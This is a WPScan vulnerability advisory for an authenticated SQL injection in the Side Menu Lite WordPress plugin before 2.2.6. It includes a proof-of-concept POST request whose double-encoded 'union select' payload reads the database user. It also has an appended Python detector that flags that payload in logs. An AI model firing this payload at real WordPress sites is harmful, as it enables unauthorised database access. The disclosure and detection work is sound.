wpvulndb
WPVDB-ID:2FACCD1B-4B1C-4B3E-B917-DE2D05E860F8
Jul 27, 2021 - 12:00 a.m.

Side Menu Lite < 2.2.6 - Authenticated SQL Injection

2021-07-27 00:00:00
wpscan.com

The plugin does not sanitise user input from the List page in the admin dashboard before using it in a SQL statement, leading to an SQL injection issue.

PoC

POST /wp-admin/admin.php?page=side-menu-lite&tab=list HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close
Cookie: [admin+]

s=aa%2527+union+select+1%2Cuser%28%29%2C3+--+a
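A log-side check for this request pattern, as an added example (not part of the original advisory or the plugin's code): it decodes the s form field of POSTs to the side-menu-lite admin page until the value is stable, then flags nested percent-encoding (the PoC's %2527 decodes to %27 and then to a quote) and SQL syntax. The function names and finding labels are hypothetical, and the sample log entries are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, unquote_plus, urlsplit

# SQL syntax that has no place in a list-search term once fully decoded.
# Deliberately broad (a lone quote matches); tune for your own traffic.
SQLI_RE = re.compile(r"'|--|/\*|\bunion\b.+\bselect\b", re.IGNORECASE | re.DOTALL)

def fully_decode(raw, max_rounds=5):
    """Form-decode once, then percent-decode until the value stops changing.
    Returns (decoded, rounds); rounds > 1 means nested encoding such as %2527."""
    value, rounds = unquote_plus(raw), 1
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_request(method, target, body):
    """Return findings for one logged request; [] means nothing suspicious."""
    query = parse_qs(urlsplit(target).query)
    if method != "POST" or query.get("page") != ["side-menu-lite"]:
        return []
    findings = []
    # Split the body by hand so each value keeps its raw encoding.
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        if name != "s":
            continue
        decoded, rounds = fully_decode(raw)
        if rounds > 1:
            findings.append("nested-encoding")
        if SQLI_RE.search(decoded):
            findings.append("sql-syntax")
    return findings

# Constructed sample log entries: (method, request target, form body).
LIST_URL = "/wp-admin/admin.php?page=side-menu-lite&tab=list"
SAMPLES = [
    ("POST", LIST_URL, "s=my+menu"),  # ordinary search term
    ("POST", LIST_URL, "s=aa%2527+union+select+1%2Cuser%28%29%2C3+--+a"),  # s value as in the PoC
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(body, "->", inspect_request(method, target, body) or "clean")
```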

CPE Name          Operator    Version
side-menu-lite    lt          2.2.6